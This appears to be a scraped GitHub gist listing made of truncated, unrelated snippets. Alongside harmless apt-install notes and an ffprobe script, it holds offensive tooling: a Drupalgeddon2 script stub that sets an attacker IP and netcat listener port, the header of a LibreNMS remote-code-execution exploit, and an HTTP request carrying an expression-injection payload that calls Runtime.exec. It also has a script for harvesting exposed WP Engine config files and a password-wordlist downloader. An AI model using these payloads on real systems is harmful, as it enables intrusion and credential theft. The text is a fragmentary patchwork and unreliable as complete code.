- 7zip
- p7zip
- p7zip-full
sudo apt-get install p7zip p7zip-full
- nautilus
- nautilus-open-terminal
sudo apt-get install nautilus-open-terminal
- browsers
- firefox
- chromium-browser
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
YOUR_EXTERNAL_IP="172.16.30.108" | |
YOUR_NETCAT_PORT="6969" | |
# Start up a netcat server | |
# netcat -l 6969 | |
HOST="http://drupal.docker.localhost:8000" | |
PHP_FUNCTION="exec" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
''' | |
# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution | |
# Date: 24/12/2018 | |
# Exploit Author: Askar (@mohammadaskar2) | |
# CVE : CVE-2018-20434 | |
# Vendor Homepage: https://www.librenms.org/ | |
# Version: v1.46 | |
# Tested on: Ubuntu 18.04 / PHP 7.2.10 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
curl -s "https://urlscan.io/api/v1/search/?q=domain:$1" | grep -E '"url"' | cut -d '"' -f4 | grep -F $1 | sort -u |
CVE-2018-7600 | Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' RCE (SA-CORE-2018-002)
Source: https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708
Improved (Ruby) exploit ~ http://github.com/dreadlocked/Drupalgeddon2/ // https://www.exploit-db.com/exploits/44449/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/local/bin/python3 | |
import subprocess | |
import shlex | |
import json | |
# function to find the resolution of the input video file | |
def findVideoMetada(pathToInputVideo): | |
cmd = "ffprobe -v quiet -print_format json -show_streams" | |
args = shlex.split(cmd) | |
args.append(pathToInputVideo) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /users HTTP/1.1 | |
Host: localhost:8080 | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 164 | |
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies. | |
# If it "no worked" (Technical Term) then you probably need to install jq! | |
TARGET=$1 | |
TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3) | |
# Pretty Colors | |
RESET='\033[00m' | |
GREEN='\033[01;32m' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#Script by OliverK | |
#Downloads _every_ wordlist in the packet storm security site. | |
#April 18th, 2011 | |
# Updated Oct , 2th, 2012 | |
mkdir common | |
cd common | |
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-4 | |
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-3 | |
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-2 |
OlderNewer